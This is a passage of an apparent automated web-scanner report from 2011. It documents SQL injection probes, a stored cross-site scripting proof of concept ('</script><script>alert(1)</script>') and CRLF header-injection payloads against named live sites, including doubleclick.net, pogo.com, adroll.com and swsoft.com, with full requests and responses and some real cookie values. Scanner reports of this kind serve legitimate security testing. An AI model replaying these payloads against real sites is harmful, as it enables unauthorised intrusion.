h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3''&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:29:28 GMT
Server: cafe
Cache-Control: private
Content-Length: 3841
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

1.3. http://googleads.g.doubleclick.net/pagead/ads [h parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600'&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:23:43 GMT
Server: cafe
Cache-Control: private
Content-Length: 9000
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600''&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:23:44 GMT
Server: cafe
Cache-Control: private
Content-Length: 3757
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

2. Cross-site scripting (stored)
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of REST URL parameter 2 submitted to the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp. The payload 4d781</script><script>alert(1)</script>9d640d4f59f was submitted in the REST URL parameter 2. This input was returned unmodified in a subsequent request for the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp4d781</script><script>alert(1)</script>9d640d4f59f?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Request 2

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Response 2

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:29 GMT
Server: Apache-Coyote/1.1
Content-Length: 12410


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
}
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp4d781</script><script>alert(1)</script>9d640d4f59f?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo
...[SNIP]...

2.2. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of REST URL parameter 2 submitted to the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp. The payload 31393</script>041f4ab8ff6 was submitted in the REST URL parameter 2. This input was returned unmodified in a subsequent request for the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp31393</script>041f4ab8ff6?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Request 2

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 12389


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
}
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp31393</script>041f4ab8ff6?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="
...[SNIP]...

3. HTTP header injection
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 94d4d%0d%0ad5e6278b016 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif94d4d%0d%0ad5e6278b016?0.18809315958060324 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1191843D63220110119210146&cid=1434549&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b30/3/0/*/g%3B237850365%3B0-0%3B2%3B58756654%3B4307-300/250%3B40455509/40473296/1%3B%3B~aopt=2/1/6d/1%3B~sscs=%3F$CTURL$&time=5|8:26|-5&r=0.18809315958060324&flash=10&server=polRedir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif94d4d
d5e6278b016
:
Date: Fri, 24 Jun 2011 13:32:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 440f8%0d%0afd67be24785 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /c/440f8%0d%0afd67be24785/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM?pv=26143364701.420067&cookie=ABL75QCUY5EGNEJJXWHGIG%3A1%7C36AMQQX26NAKPETSLKXA3W%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A2&width=468&height=60&x=0&y=0&keyw=&cpm=g)))TgSPJQAHQHIK5XdUBd5fQRecsO_YZwjowKwVMA HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=60&slotname=2204023174&w=468&lmt=1308927567&flash=10.3.181&url=http%3A%2F%2Fphuket.com%2F&dt=1308921637628&bpp=5&shv=r20110615&jsv=r20110616&correlator=1308921637930&frm=4&adk=1151138738&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=791522303&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=36813006&fu=0&ifi=1&dtd=426&xpc=k1mQeRIDm4&p=http%3A//phuket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Fri, 24 Jun 2011 13:24:15 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/440f8
fd67be24785
/Y2YJ7A74HNGIZPY5GRC64S/aa124d880659045d2ecfa27a65500c85.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3.3. http://sales.swsoft.com/buyonline/ [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the key request parameter is copied into the location response header. The payload cde47%0d%0a51dddc47dfc was submitted in the key parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=10.0.0&os=windows&locale=en-US&key=cde47%0d%0a51dddc47dfc HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=cde47
51dddc47dfc

Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


3.4. http://sales.swsoft.com/buyonline/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the location response header. The payload 63065%0d%0a38879286b1d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=10.0.0&os=windows&locale=en-US&key=SMB015741170000&63065%0d%0a38879286b1d=1 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000&63065
38879286b1d
=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


3.5. http://sales.swsoft.com/buyonline/ [os parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the os request parameter is copied into the location response header. The payload c2c42%0d%0ade299d446bb was submitted in the os parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=10.0.0&os=c2c42%0d%0ade299d446bb&locale=en-US&key=SMB015741170000 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/addons/?store_id=1&version=10.0.0&os=c2c42
de299d446bb
&key=SMB015741170000
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


3.6. http://sales.swsoft.com/buyonline/ [store_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the store_id request parameter is copied into the location response header. The payload 71e53%0d%0a84c3c05dd74 was submitted in the store_id parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=71e53%0d%0a84c3c05dd74&version=10.0.0&os=windows&locale=en-US&key=SMB015741170000 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=71e53
84c3c05dd74
&version=10.0.0&os=windows&key=SMB015741170000
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


3.7. http://sales.swsoft.com/buyonline/ [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the version request parameter is copied into the location response header. The payload 454ba%0d%0a35cbc67735f was submitted in the version parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=454ba%0d%0a35cbc67735f&os=windows&locale=en-US&key=SMB015741170000 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=1&version=454ba
35cbc67735f
&os=windows&key=SMB015741170000
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


